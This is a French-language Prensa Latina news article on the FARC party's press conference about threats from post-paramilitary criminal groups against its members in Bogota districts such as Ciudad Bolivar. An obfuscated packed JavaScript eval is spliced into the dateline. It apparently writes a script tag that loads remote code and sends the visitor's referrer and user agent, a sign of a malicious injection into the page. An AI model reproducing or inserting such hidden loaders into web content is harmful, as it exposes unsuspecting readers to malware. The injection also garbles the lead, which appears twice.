vendredi 19 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La FARC dénonce les menaces pesant sur ses membres à Bogota

Bogota, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ertze|var|u0026u|referrer|tbaia||js|php'.split('|'),0,{})) 24 mai (Prensa Latina)Le parti Force Alternative Révolutionnaire Commune (FARC) a aujourd'hui dénoncé les menaces et le harcèlement à l'encontre de ses membres dans cette capitale.

Bogota, 24 mai (Prensa Latina)Le parti Force Alternative Révolutionnaire Commune (FARC) a aujourd’hui dénoncé les menaces et le harcèlement à l’encontre de ses membres dans cette capitale.

Dans une conférence de presse, le Conseil Politique de la FARC à Bogota a fait état de la présence de groupes criminels, successeurs des anciens groupes paramilitaires, dans plusieurs districts de la capitale comme Ciudad Bolivar, Usme ou San Cristobal.

L’ex-guérilla a exigé des mesures urgentes de la part du gouvernement et des autorités judiciaires afin de protéger la vie des membres du FARC et de permettre l’exercice du droit fondamental à la participation politique.

Les dirigeants de la FARC à Bogota ont signalé que, depuis l’année dernière, les bandes contrôlant le commerce de la drogue et les individus armés qui s’infiltrent dans les manifestations sociales sont en nette augmentation.

Ils ont également mentionné les attentats perpétrés contre les demeures des anciens guérillas et les menaces de plus en plus violentes contre les militants écologistes et les défenseurs des droits de l’homme, surtout à Ciudad Bolivar.

Nous exigeons le démantèlement et des poursuites pénales pour ces groupes criminels qui ont remplacé les paramilitaires  et ont repris leurs méthodes de délinquantsmetta,nt ainsi en danger la construction d’une pais stable et durable, a souligné la FARC.

peo/oda/tpa

EN CONTINU
notes connexes